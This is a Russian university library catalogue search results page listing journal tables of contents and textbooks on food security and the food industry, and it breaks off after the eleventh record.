Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

52 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 19
1. 
Пищевая промышленность. - Журнал, 2004г. № 10
Оглавление 
  • Парагульгов, О. Д. Тернистый путь поправок в основной отраслевой закон: [ФЗ "О гос. регулировании производства и оборота этилового спирта, алкогольной и спиртосодержащей продукции"] / О. Д. Парагульгов, В. А. Цыганков. - с.6-10
  • Парагульгов, О. Д. Зарубежный и отечественный опыт акцизной политики в алкогольном секторе экономики / О. Д. Парагульгов, В. А. Цыганков, О. Мизюк. - с.12-17
    Кл. слова: АКЦИЗЫ - НАЛОГИ, акцизы - зарубежный опыт
  • Козин, Е. Б. Обработка информации во внутрихозяйственной системе контроля / Е. Б. Козин, А. С. Гоубев. - с.20-22
  • Смоленцев, В. М. Математическое моделирование в экономике АПК / В. М. Смоленцев. - с.24-25
    Кл. слова: МОДЕЛИРОВАНИЕ МАТЕМАТИЧЕСКОЕ
  • Яновский, А. М. Влияние внешней среды на деятельность предприятий / А. М. Яновский. - с.25
    Кл. слова: СРЕДА ВНЕШНЯЯ - ПРЕДПРИЯТИЕ
  • Болдычева, А. Г. Проблемы определения стратегии экономического развития на примере предприятий кондитерской отрасли / А. Г. Болдычева, Т. М. Панченко. - с.26-27
  • Климова, Н. В. Производство конкурентоспособной молочной продукции в интегрируемых организациях / Н. В. Климова. - с.28-30
    Кл. слова: ПРОДУКЦИЯ МОЛОЧНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Бутковский, В. А. Развитие системы дополнительного профессионального образования в России / В. А. Бутковский. - с.32-35
    Кл. слова: ОБРАЗОВАНИЕ ДОПОЛНИТЕЛЬНОЕ
  • Богачук, Н. Н. Применение кизельгуров и перлитов для фильтрации в свеклосахарном производстве / Н. Н. Богачук, И. А. Маркович, А. А. Лапин. - с.38-39
  • Структурная модель гетерогенно-гетерофазных рецептурных пищевых смесей / ; А. Е. Краснов, О. Н. Красуля, С. А. Красников и др.. - с.42-44
  • Резниченко, И. Ю. Новый вид пищевых концентратов: мюсли-батончик / И. Ю. Резниченко, В. М. Позняковский. - с.46-47
  • Энергосберегающее теплообменное оборудование в сахарной промышленности / ; П. А. Капустенко, А. В. Демирский, Г. Л. Хавин и др.. - с.50-52
  • Обеззараживание сыпучих пищевых продуктов - новый взгляд. - с.56-57
  • Удаление крахмала из тростникового сахара-сырца / ; М. И. Егорова, Л. И. Беляева, С. И. Казакова, А. И. Чугунов. - с.58-60
  • Попова, О. Г. Правовая основа стандартизации, сертификации и метрологии / О. Г. Попова, А. В. Попова, В. Н. Смоленцев. - с.62-63
  • Проселков, В. Г. Аудит систем менеджмента в России соответствует международным стандартам / В. Г. Проселков. - с.64-65
    Кл. слова: МЕНЕДЖМЕНТ КАЧЕСТВА
  • Кудряшева, А. А. Продовольственная безопасность: критерии, категории, биорегуляционные средства / А. А. Кудряшева. - с.66-67
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Сухих, Т. Н. Натуральные ингредиенты для обработки поверхности кондитерских изделий / Т. Н. Сухих. - с.71-72
  • Стейлс, Й. Эмульгирующие и стабилизирующие системы / Й. Стейлс. - с.74
    Кл. слова: ЭМУЛЬГАТОР, СТАБИЛИЗАТОР
  • Антимонов, К. А. Улучшение качества пшена созданием устойчивых к болезням сортов проса / К. А. Антимонов, А. К. Антимонов, А. А. Михайлов. - с.76-77
  • Шулбаева, М. Т. Функциональные продукты с учетом национальных традиций / М. Т. Шулбаева. - с.80-84
    Кл. слова: талган, ПРОДУКТ ФУНКЦИОНАЛЬНЫЙ
  • Толкунова, Н. Н. Минеральный и витаминный состав новых видов вареных колбасных изделий / Н. Н. Толкунова. - с.86
    Кл. слова: ИЗДЕЛИЯ колбасные
  • Фирсова, Н. А. Мюсли функционального назначения / Н. А. Фирсова, А. Ф. Доронин. - с.88-89
  • Андрейчук, В. П. Органический йод и питание человека / В. П. Андрейчук. - с.90-92
    Кл. слова: ЙОД - ПИТАНИЕ
Держатели документа (Информация об экземплярах) 
2. 
Пищевая промышленность. - Журнал, 2004г. № 7
Оглавление 
  • Обеспечение продовольственной безопасности населения Российской Федерации. - с.6-13
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Кудряшева, А. А. Продовольственная безопасность и развитие человечества / А. А. Кудряшева, Е. В. Оникиенко. - с.14-15
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Вишневецкий, В. Общественный контроль качества продуктов питания в Санкт-Петербурге / В. Вишневецкий. - с.16
  • Минаева, Е. В. Экономические механизмы государственного регулирования зерновой сферы / Е. В. Минаева. - с.17-19
  • X Международная научно-практическая конференция "Стратегия развития пищевой промышленности (иностранные инвестиции)". - с.20-28
  • Кайшев, В. Г. Государственное регулирование в сфере производства и реализации продукции пищевой промышленности / В. Г. Кайшев ; 30-32
  • Муртазаева, Р. Н. Влияние налоговой нагрузки на эффективность ликероводочного производства / Р. Н. Муртазаева, Р. Ю. Скоков. - с.34-35
  • Островская, Т. Г. Организация труда и новый Трудовой кодекс Российской Федерации / Т. Г. Островская, И. В. Юдина. - с.36-38
  • Маламуд, Д. Б. Концепция управления производством птицеперерабатывающей отрасли / Д. Б. Маламуд. - с.40-41
  • Степанова, В. С. Обоснование потребностей населения региона в продуктах питания / В. С. Степанова. - с.42-43
  • Докучаев, И. А. Проблемы выпуска продукции в условиях экономических рисков / И. А. Докучаев. - с.44-46
  • Набатников, В. М. Предпринимательская этика не пассивна! / В. М. Набатников. - с.50-51
  • Вопияшин, О. Я. Микро- и ультрафильтрация на керамических мембранах при производстве соков / О. Я. Вопияшин. - с.60-61
  • Гарзанов, А. Л. очистка производственных сточных вод малых предприятий по производству растительного масла: опыт и проблемы / А. Л. Гарзанов, А. А. Тельнов, В. П. Барабаш. - с.62-63
  • Остриков, А. Н. Сушка грибов перегретым паром атмосферного давления / А. Н. Остриков, Е. С. Шенцова, С. А. Шевцов. - с.64-65
  • Новый облик глазированного сырка. - с.69
    Кл. слова: Сырок глазированный
  • Кузнецова, Л. М. Упаковка рационов питания и средств личной гигиены экипажей космических кораблей и орбитальных станций / Л. М. Кузнецова, В. И. Селиванова. - с.70
  • Брендин, Н. В. Оценка потребительских свойств вареных колбас с функциональными добавками / Н. В. Брендин, В. М. Зимняков
    Кл. слова: КОЛБАСА вареная
  • Шленская, Т. В. Прогнозирование влияния промышленных отходов на здоровье человека / Т. В. Шленская, В. Н. Голубев, Н. В. Дмитриева. - с.77
  • Никифорова, Т. А. Пищевые кислоты - необходимые ингредиенты при производстве пищевой продукции / Т. А. Никифорова. - с.78-79
    Кл. слова: Кислота пищевая
  • Полянский, К. К. Производство пищевых продуктов с использованием натурального подсластителя из стевии / К. К. Полянский, Г. К. Подпоринова, Д. М. Богомолов. - с.80-81
  • Урюпина, Т. Л. Окружающая среда и продукты питания / Т. Л. Урюпина, Б. К. Джурупова. - с.82-83
    Кл. слова: ПИТАНИЕ - ЭКОЛОГИЯ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Мендельсон, Г. И. Значение соевых белковых продуктов в питании человека / Г. И. Мендельсон. - с.84-86, СОЯ - ПИТАНИЕ
  • Михеева, Г. А. Новый отечественный белковый продукт для беременных и кормящих женщин / Г. А. Михеева, Л. Н. Шатнюк, В. Б. Спиричев. - с.88-89
    Кл. слова: ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ
  • Зуев, Е. Т. Функциональные напитки: их место в концепции здорового питания / Е. Т. Зуев. - с.90-95
Держатели документа (Информация об экземплярах) 
3. 
Пищевая промышленность. - Журнал, 2004г. № 6
Оглавление 
  • Сизенко, Е. И. Проблемы хранения продукции АПК / Е. И. Сизенко. - с.9-11
    Кл. слова: ХРАНЕНИЕ ПРОДУКТОВ АПК
  • Кайшев, В. Г. Плодоовощная промышленность России в 1999-2003 гг. / В. Г. Кайшев, В. М. Черкасова. - с.12-16
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПЛОДООВОЩНАЯ
  • Пенто, В. Б. Технология производства продукта промежуточной влажности из картофеля / В. Б. Пенто, О. А. Клюева. - с.18-19
    Кл. слова: Картофель - полуфабрикаты
  • Производство плодово-ягодных маринадов с использованием растительного сырья Западной Сибири / ; О. В. Голуб, В. М. Поздняковский, И. Н. Ковалевская, С. Б. Васильева. - с.20-21
    Кл. слова: Маринад плодово-ягодный
  • Троян, З. А. Высокотемпературная стерилизация в потоке соков с мякотью / З. А. Троян, Л. В. Михайлюта, Н. Н. Корастилева. - с.22-23
  • Термоустойчивость спор Cl. botulinum при стерилизации овощных закусочных консервов / ; Л. А. Русланова, Л. В. Михайлюта, Н. С. Коробкина, С. С. Чуприна. - с.23
  • Магомедов, Р. К. Продление сроков хранения перца сладкого / Р. К. Магомедов, F. Adamicki. - с.24-25
    Кл. слова: Перец сладкий - хранение
  • Минаева, Е. В. Проблемы активизации государственной политики протекционизма отечественных товаропроизводителей зерна / Е. В. Минаева. - с.26-27
  • рябова, Т. Ф. Воздействие рисков хозяйственно-экономической деятельности на эффективность предприятий / Т. Ф. рябова, Моурик С. В. Ван. - с.28-29
    Кл. слова: Теория риска
  • Болдычева, А. Г. Определение стратегии экономического развития предприятия / А. Г. Болдычева, Т. М. Панченко. - с.3032
    Кл. слова: СТРАТЕГИЯ ПРЕДПРИЯТИЯ
  • Карданова, Л. И. Мониторинг потребительских предпочтений как элемент стратегического планирования / Л. И. Карданова, М. С. Боборенко. - с.34-36, ПРОДУКТЫ МОЛОЧНЫЕ - маркетинг
  • Магомедов, М. Д. Рынок мясных полуфабрикатов и проблемы его развития / М. Д. Магомедов, О. В. Милюкова. - с.37
    Кл. слова: Рынок полуфабрикатов мясных, ПОЛУФАБРИКАТЫ мясные
  • Бегучев, Н. И. Проблемы налогообложения малых предприятий / Н. И. Бегучев, С. В. Горин, С. Э. Курбанов. - с.38-40
    Кл. слова: ПРЕДПРИЯТИЕ МАЛОЕ - налоги, НАЛОГООБЛОЖЕНИЕ ПРЕДПРИЯТИЯ
  • Сервер промышленных приложений Wonderware Production Engine. - с.41-44
  • Климова, Д. В. Информационные системы управления на предприятиях АПК / Д. В. Климова. - с.46
    Кл. слова: АПК - информатизация
  • Крутикова, Е. О специальных защитных, антидемпинговых и компенсационных мерах при импорте товаров / Е. Крутикова, Ю. Боровикова. - с.47-49
  • Тужилкин, В. И. Предлагаем программы профессиональной переподготовки / В. И. Тужилкин, В. С. Сергунов. - с.50-52
  • Голубев, С. А. Метод начала "с нуля" в форме бюджетирования / С. А. Голубев, Е. В. Козин, Т. А. Козина. - с.53-55
  • Жапаров, К. Ж. Продовольственная безопасность Республики Казахстан / К. Ж. Жапаров, В. К. Чашин. - с.56-57
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Нечаев, А. П. Союз производителей пищевых ингредиентов / А. П. Нечаев. - с.58-59
  • Тулякова, Т. В. Дрожжевые экстракты - безопасные источники витаминов, минеральных веществ и аминокислот / Т. В. Тулякова, А. В. Пасхин, В. Ю. Седов. - с.60-62
    Кл. слова: ЭКСТРАКТ дрожжевой
  • Каргопольцев, В. П. Защита электродвигателей промышленного назначения / В. П. Каргопольцев. - с.63
  • Щеглов, А. Ю. Новинки "МОЛМАША" / А. Ю. Щеглов, В. П. Карцев. - с.64
  • Бегларян, А. Р. Влияние магнитного поля на антогонистические свойства молочнокислых и бифидобактерий / А. Р. Бегларян, Р. А. Баклачян, Н. Р. Бегларян. - с.66
  • Совершенствование теплоустановок / ; Л. Л. Товажнянский, П. А. Капустенко, С. И. Бухкало, Г. Л. Халвин, А. В. Демирский. - с.68
  • Тулик, Ю. И. Экономичная система расходования водяного пара / Ю. И. Тулик. - с.69
  • Сухих, Т. Н. Новое время - новые кондитерские изделия / Т. Н. Сухих. - с.84
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Бекалюк, А. Е. "Вторую жизнь" безалкогольным напиткам / А. Е. Бекалюк. - с.86
  • Нарушин, В. Г. Бета-каротин из плесени / В. Г. Нарушин. - с.87
  • Самофалова, Л. А. Эмульсии растительного молока для производства мороженого / Л. А. Самофалова, А. П. Симоненкова. - с.88-89
  • Мендельсон, Г. И. Значение соевых белковых продуктов в питании человека / Г. И. Мендельсон. - с.90-91
    Кл. слова: СОЯ - питание
  • Филлипова, Л. Ю. Продукты питания лечебно-профилактического назначения для детей / Л. Ю. Филлипова, Л. П. Сергеева. - с.92
    Кл. слова: ПИТАНИЕ ДЕТЕЙ лечебное
  • Шатнюк, Л. Н. Обогащение микронутриентами пищевых концентратов на зерновой основе / Л. Н. Шатнюк, А. В. Юдина. - с.94-97
  • Комбинированные продукты питания функционального назначения с белково-жировыми композитами / ; Е. И. Титов, С. К. Апраксина, Л. Ф. Митасева. - с.98-99
  • Пилат, Т. Л. Производственные группы БАД / Т. Л. Пилат. - с.100-101
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
Держатели документа (Информация об экземплярах) 
4. 
Пищевая промышленность. - Журнал, 2005г. № 8
Оглавление 
  • Кудряшева, А. А. Продовольственная безопасность: показатели, критерии, категории и масштабы / А. А. Кудряшева, О. П. Преснякова. - с.18-21
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Маргулис, Е. И. Критерии и параметры оптимального уровня удовлетворения потребительских предпочтений / Е. И. Маргулис. - с.22-25
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Сергеев, В. Н. Потребительская корзина россиян и рациональные нормы потребления / В. Н. Сергеев. - с.28-31
    Кл. слова: КОРЗИНА ПОТРЕБИТЕЛЬСКАЯ, питание населения, БЕЛОК - ПИТАНИЕ
  • Серегин, С. М. Современное состояние и перспективы развития пищевой промышленности РФ / С. М. Серегин. - с.32-36
  • Виноградов, К. И. Будущее российского крахмала / К. И. Виноградов. - с.46-47
  • Поверин, Д. И. Адекватное питание и его практическая реализация / Д. И. Поверин, Ю. А. Тырсин. - с.50-51
    Кл. слова: питание адекватное
  • Кантере, В. М. Оборудование как фактор управления качеством в пищевой промышленности / В. М. Кантере, В. А. Матисон. - с.56-57
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-июнь 2005 г.. - с.84-85
  • Алексейчева, Е. Ю. Основные пути и факторы повышения конкурентоспособности промышленных предприятий / Е. Ю. Алексейчева. - с.90-92
  • Костылева, О. Ф. Техническое регулирование в области производства и оборота пищевых продуктов / О. Ф. Костылева. - с.98-99
    Кл. слова: РЕГУЛИРОВАНИЕ ТЕХНИЧЕСКОЕ
  • Аналитические приборы для определения качества пищевых продуктов. - с.100-102
    Кл. слова: СПЕКТРОМЕТРИЯ
  • Безопасность плодово-ягодного сырья / ; С. Б. Васильева, О. В. Голуб, И. Н. Ковалевская, Д. Г. Попова. - с.106
  • Бакулина, О. Н. Использование биологически активных веществ в пищевых технологиях: премиксы витаминов и микроэлементов / О. Н. Бакулина. - с.120-122
  • Степанова, Л. И. К вопросу о качестве продуктов сложного сырьевого состава / Степанова Л. И., Л. А. Забодалова, С. Б. Жукова. - с.130
    Кл. слова: ЖИР РАСТИТЕЛЬНЫЙ, ЭМУЛЬСИя
  • Силагадзе, М. А. Культура ореха в Западной Грузии и перспективы ее промышленного использования / М. А. Силагадзе, И. О. Берулава, А. В. Иобидзе. - с.136-137
Держатели документа (Информация об экземплярах) 
5. 
Пищевая промышленность. - Журнал, 2005г. № 10
Оглавление 
  • Балаева, С. И. Пищевая промышленность Южного федерального округа / С. И. Балаева. - с.20-22
  • Тульская, Н. С. Формирование стратегии по товарным группам диверсифицированных компаний / Н. С. Тульская, Н. М. Климкина. - с.24-27
  • Кудряшева, А. А. Продовольственная сфера: особенности и значение / А. А. Кудряшева, О. П. Преснякова, С. Н. Кавотин. - с.28-29
  • Севрюкова, Г. Л. Проблемы национальной продовольственной безопасности / Г. Л. Севрюкова. - с.31
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Исмаилов, Э. Ш. Новый способ интенсификации процесса экстракции / Э. Ш. Исмаилов, Т. Н. Даудова, Д. С. Джаруллаев. - с.32
  • Мезенова, О. Я. Перспективные направления биотехнологии морепродуктов / О. Я. Мезенова. - с.34-35
  • Бобок, М. Б. Способы снижения массы резаного табака при изготовлении курительных изделий / М. Б. Бобок, И. И. Татарченко, Ю. В. Алтунтян. - с.44
  • Восточная Европа переживает рост производства упакованной продукции. - с.52-53
    Кл. слова: УПАКОВКА ПРОДУКЦИИ - европа
  • Соренсен, Л. Конкуренция центробежных насосов, отвечающая повышенным санитарно-гигиеническим требованиям технологического процесса / Л. Соренсен. - с.48-50
  • Украинская, Т. Полистирол для премиум-класса / Т. Украинская. - с.54-56
  • Сергеева, Л. С. Новые нормативные документы на стеклянную тару / Л. С. Сергеева. - с.57
    Кл. слова: ТАРА СТЕКЛЯННАЯ
  • Проселков, В. Г. Развитие национальной системы стандартизации России / В. Г. Проселков. - с.58-60
    Кл. слова: СТАНДАРТИЗАЦИЯ - РОССИЯ
  • Малофеева, Ю. С. Реализация системы НАССР в технологическом процессе производства пищевых вкусоароматических добавок компании "ОМЕГА" / Ю. С. Малофеева, О. Н. Красуля. - с.62-63
  • Мачихин, С. А. Нужны ли системы менеджмента качества в пищевой и перерабатывающих отраслях АПК? / С. А. Мачихин, А. Н. Стрелюхина. - с.64-65
  • Гурова, Н. В. Использование конжаковой камеди и муки в пищевых технологиях / Н. В. Гурова, В. В. Сучков, Н. А. Чулкова. - с.78-79
  • Нутриентная адекватность и медико-биологическая оценка консервов для энтерального питания детей раннего возраста / ; А. В. Устинова, А. С. Дыдыкин, С. И. Хвыля и др.. - с.88-90
    Кл. слова: ПИТАНИЕ ЭНТЕРАЛЬНОЕ
  • Консервированные продукты из сои для полноценного питания / ; С. К. Тамкович, Н. М. Степанищева, Н. Е. Посокина, Л. И. Кизим. - с.91
    Кл. слова: СОЯ - ПИТАНИЕ
  • Кудряшева, А. А. Новые направления научно-технического развития в области питания, здоровья и экологии / А. А. Кудряшева. - с.92-93
Держатели документа (Информация об экземплярах) 
6. 
Пищевая промышленность. - Журнал, 2007г. № 6
Оглавление 
  • Кайшев, В. Г. Анализ макроэкономических показателей развития пищевой и перерабатывающей промышленности Российской Федерации за 1995-2006 гг. / В. Г. Кайшев. - с.8-11
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Бойко, А. Г. Российский рынок упаковки / А. Г. Бойко. - с.12-14
    Кл. слова: РЫНОК УПАКОВКИ
  • Шамшурко, С. М. Новые типы фасовочного оборудования для малых производств / С. М. Шамшурко, Ю. А. Калошин, В. А. Трунов. - с.16-18
    Кл. слова: ОБОРУДОВАНИЕ ФАСОВОЧНО-УПАКО
  • Немцевич, А. Стерильная упаковка детского питания на асептической машине / А. Немцевич. - с.22-23
    Кл. слова: ПИТАНИЕ ДЕТЕЙ - УПАКОВКА
  • Съедобная упаковка: состояние и перспективы. - с.24-25
    Кл. слова: упаковка съедобная
  • Легонькова, О. А. Биоразлагаемые полимерные материалы в пищевой промышленности / О. А. Легонькова. - с.26-28
  • Рестайлин упаковки, или ТО для Вашего Бренда. - с.30-32
    Кл. слова: РЕСТАЙЛИНГ
  • Трясцин, М. М. Концептуальные подходы развития АПК и укрепления продовольственной безопасности территории / М. М. Трясцин. - с.40-42
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Дзейтова, А. А. Современное состояние малого бизнеса в Республике Ингушетии / А. А. Дзейтова. - с.44-45
    Кл. слова: ИНГУШЕТИЯ - БИЗНЕС МАЛЫЙ
  • Корольченко, И. В. Россия на пороге вступления в ВТО / И. В. Корольченко. - с.46-48
  • Пономарев, А. Н. Получение пастеризованного молока длительного срока хранения / А. Н. Пономарев. - с.50-51
    Кл. слова: МОЛОКО - ПРОИЗВОДСТВО
  • Зимняков, В. М. Сравнительная характеристика функциональных смесей для производства мясопродуктов / В. М. Зимняков, Н. В. Брендин. - с.62
Держатели документа (Информация об экземплярах) 
7. 
Пищевая промышленность. - Журнал, 2007г. № 1
Оглавление 
  • Арсеньева, Т. П. Основные вещества для обогащения продуктов питания / Т. П. Арсеньева, И. В. Баранова. - с.6-8
    Кл. слова: ВИТАМИНЫ - ПИТАНИЕ, ВОЛОКНО ПИЩЕВОЕ, ПРОБИОТИКИ
  • Шишков, Ю. И. Некоторые аспекты продуктов функционального питания / Ю. И. Шишков. - с.10-11
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ
  • Ипатова, Л. Г. Новые направления в создании функциональных жировых продуктов / Л. Г. Ипатова, А. А. Кочеткова, А. П. Нечаев. - с.12-14
    Кл. слова: ПРОДУКТ ЖИРОВОЙ
  • Функциональные комбинированные молочные напитки / ; Е. Е. Курчаева, И. В. Максимов, В. И. Манжесов, О. В. Столяров. - с.16-17
    Кл. слова: НАПИТОК МОЛОЧНЫЙ
  • Ломачинский, В. А. Новые функциональные плодоовощные продукты / В. А. Ломачинский. - с.18-19
    Кл. слова: КОНСЕРВЫ ПЛОДООВОЩНЫЕ
  • Макаров, В. Н. Продукты питания функционального назначения на плодоовощной основе / В. Н. Макаров, Л. Н. Влазнева. - с.20-21
  • Сулимина, О. Г. Леденцы функционального назначения / О. Г. Сулимина. - с.24
  • Жирард, К. Добавьте немного цвета в полезные для здоровья снеки / К. Жирард. - с.26-27
  • Доронин, А. Ф. Функциональные продукты длительного хранения / А. Ф. Доронин, Т. И. Изотова, П. А. Двоеносова. - с.28-29
  • Аналитические исследования структуры питания студентов / ; Е. И. Титов, Л Ф. Митасева, И. В. Глазкова, М. А. Никитина. - с.30-31
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-октябрь 2006 года. - с.36-37
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ, ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА
  • Кудрявцев, В. В. Проблемы реализации Национального проекта развития АПК / В. В. Кудрявцев. - с.42-43
  • Сидоров, А. Н. Научные предпосылки реструктуризации системы управления организациями / А. Н. Сидоров. - с.44-45
    Кл. слова: СИСТЕМА УПРАВЛЕНИЯ ПРЕДПРИЯТ
  • Касьяненко, А. Перспективы повышения качества российского продовольствия (на основе опыта канадской системы пищевой безопасности) / А. Касьяненко, С. Оболенский, С. Джойл. - с.64-65
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2005г. № 11
Оглавление 
  • Трясцин, М. М. Регулирование вопросов продовольственной безопасности / М. М. Трясцин. - с.6-8
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Мачихин, С. А. Об одном из аспектов продовольственной безопасности России / С. А. Мачихин, А. Н. Стрелюхина. - с.10-11
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Кудряшева, А. А. Продовольственная сфера: особенности и значение / А. А. Кудряшева, О. П. Преснякова, С. Н. Кавотин. - с.16-20
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь - сентябрь 2005 г.. - с.30-31
  • Магомедов, М. Д. Методика оценки конкурентного потенциала предприятий пищевой промышленности / М. Д. Магомедов, С. И. Корочкова. - с.32-33
  • Богомолова, И. П. Современное состояние и принципы взаимодействия предприятий зернопродуктового комплекса / И. П. Богомолова, Е. В. Хохлов. - с.34-36
  • Гажур, А. А. Безразмерный критерий энергетической эффективности тепловых процессов и аппаратов / А. А. Гажур. - с.48
  • Богдан, Г. А. Пути улучшения качества сигаретных фильтрующих материалов и фильтров / Г. А. Богдан, И. И. Татарченко, О. А. Бирюкова. - с.52
  • Влияние окислителей на красящие вещества в сахарной промышленности / ; И. В. Апасов, В. В. Агеев, Г. К. Подпоринова, В. А. Федорук. - с.60
  • Синькевич, М. А. Ресурсы инновационных технологий как способ повышения конкурентной привлекательности основных групп мучных кондитерских изделий / М. А. Синькевич. - с.62-64
  • Файвишевский, М. Л. Использование отходов мясоперерабатывающей промышленности при производстве заменителя цельного молока / М. Л. Файвишевский, Н. А. Смекалов. - с.66-67
  • Макаронные изделия повышенной биологической ценности / ; В. В. Мартиросян, У. Н. Диденко, Е. В. Жиркова, В. Д. Малкина. - с.74-75
Держатели документа (Информация об экземплярах) 
9. 
Хлебопечение России. - Журнал, 2004г. № 4
Оглавление 
  • Косован, А. П. Применение системы "директ-костинг" при планировании ассортимента хлебобулочных изделий / А. П. Косован, С. Д. Храбров. - с.4-6
    Кл. слова: АССОРТИМЕНТ хлеба
  • Кирюхина, А. Н. Анализ уровня и тенденций спроса на традиционное и замороженное тесто / А. Н. Кирюхина. - с.7
  • Поландова, Р. Д. Приготовление жидких дрожжей на хлебопекарных предприятиях: проблемы и пути решения / Р. Д. Поландова, Т. В. Быковченко, Л. С. Логачева. - с.12-13
    Кл. слова: ДРОЖЖИ жидкие
  • Еркинбаева, Р. К. Технологии хлебобулочных изделий из тритикалевой муки / Р. К. Еркинбаева. - с.14-15
  • Новые виды хлебобулочных изделий, обогащенных железом и витаминами. - с.17-18
  • Комбинированная смесь для выработки хлебобулочных изделий / ; Л. П. Пащенко, И. А. Никитин, Ю. В. Васильева, М. В. Лагоденко. - с.19-21
  • Андрейчук, В. П. Обогащенный хлеб - универсальный йодосодержащий продукт / В. П. Андрейчук. - с.22-23
  • Храмцов, А. Г. Разработка и применение нового концентрата с лактулозой в хлебопекарной промышленности / А. Г. Храмцов, И. А. Евдокимов, Б. О. Суюнчева. - с.24
  • Кузнецов, В. А. Опрыскиватели готовой продукции в хлебопекарной промышленности / В. А. Кузнецов, В. И. Литвинов. - с.25-27
  • Троицкий, Б. Н. Улучшитель качества вафельного листа / Б. Н. Троицкий, В. В. Письменный, Н. А. Леонтьева. - с.34
  • Обеспечение продовольственной безопасности населения Российской Федерации. - с.44-46
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Коновалова, М. Ю. Печатный пряник, или "царь" русских лавок / М. Ю. Коновалова. - с.48-51
    Кл. слова: ПРЯНИКИ - история
Держатели документа (Информация об экземплярах) 
10. 
Карпенков С. Х. Концепции современного естествознания [Текст] : учеб. для студ. высш. учеб. заведений / С. Х. Карпенков, 2009. - 670 с.
Ключевые слова 
ХИМИЯ - ЕСТЕСТВОЗНАНИЕ -- Катализ -- МЕТАЛЛЫ -- УГЛЕРОД -- ЭНЕРГОРЕСУРС ПЕРВИЧНЫЙ -- Энергетика -- Изотоп радиоактивный -- РЕАКЦИЯ ХИМИЧЕСКАЯ -- АЛМАЗ искусственный -- ТКАНЬ синтетическая -- ВЕЩЕСТВА ВРЕДНЫЕ -- ОЗОНОВЫЙ СЛОЙ -- Микромир -- Макромир -- Мегамир -- Вещество -- ПРОЦЕСС ХИМИЧЕСКИЙ -- ЕСТЕСТВОЗНАНИЕ - СЛОВАРЬ ТЕР -- ДОЖДЬ КИСЛОТНЫЙ -- ГЕНОМ ЧЕЛОВЕКА -- ПАРНИКОВЫЙ ЭФФЕКТ -- ОТХОДЫ РАДИОАКТИВНЫЕ - ЭКОЛО -- Белок - питание -- ПРОИСХОЖДЕНИЕ ЖИЗНИ -- ЭВОЛЮЦИЯ ЖИЗНИ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- СТАРЕНИЕ организма -- БИОТЕХНОЛОГИЯ -- ИНЖЕНЕРИЯ ГЕННАЯ -- Клонирование
Держатели документа (Информация об экземплярах) 
11. 
Экономика предприятия пищевой промышленности [Текст] : Учеб. для вузов, 2003. - 615 с.
Ключевые слова 
